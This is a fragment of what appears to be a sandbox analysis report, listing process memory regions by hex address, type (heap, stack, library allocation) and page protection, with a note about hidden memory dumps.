|
trusted library section
|
page readonly
|
||
1EE859B0000
|
heap
|
page read and write
|
||
22389802000
|
heap
|
page read and write
|
||
272C3780000
|
heap
|
page read and write
|
||
2238E7F0000
|
trusted library allocation
|
page read and write
|
||
1DED3FE0000
|
heap
|
page read and write
|
||
244C234E000
|
heap
|
page read and write
|
||
C36DD7A000
|
stack
|
page read and write
|
||
18D2EC47000
|
heap
|
page read and write
|
||
2238EA00000
|
trusted library allocation
|
page read and write
|
||
272C3868000
|
heap
|
page read and write
|
||
7EF477D000
|
stack
|
page read and write
|
||
22389102000
|
heap
|
page read and write
|
||
1FCB7C00000
|
heap
|
page read and write
|
||
C36DA7F000
|
stack
|
page read and write
|
||
C36DBFA000
|
stack
|
page read and write
|
||
244C1A71000
|
heap
|
page read and write
|
||
2A24D089000
|
heap
|
page read and write
|
||
16370FB0000
|
heap
|
page read and write
|
||
1FCBCC63000
|
heap
|
page read and write
|
||
24D0C657000
|
heap
|
page read and write
|
||
776009C000
|
stack
|
page read and write
|
||
2238A500000
|
trusted library allocation
|
page read and write
|
||
7EF3F9E000
|
stack
|
page read and write
|
||
1F64A390000
|
heap
|
page read and write
|
||
1DED9B55000
|
unkown
|
page read and write
|
||
204B1476000
|
heap
|
page read and write
|
||
1FCB7E81000
|
trusted library allocation
|
page read and write
|
||
22389959000
|
heap
|
page read and write
|
||
1F64A3CF000
|
heap
|
page read and write
|
||
1FCB7258000
|
heap
|
page read and write
|
||
1FCBC990000
|
trusted library allocation
|
page read and write
|
||
8A01C7E000
|
stack
|
page read and write
|
||
204B142A000
|
heap
|
page read and write
|
There are 1215 hidden memdumps, click here to show them.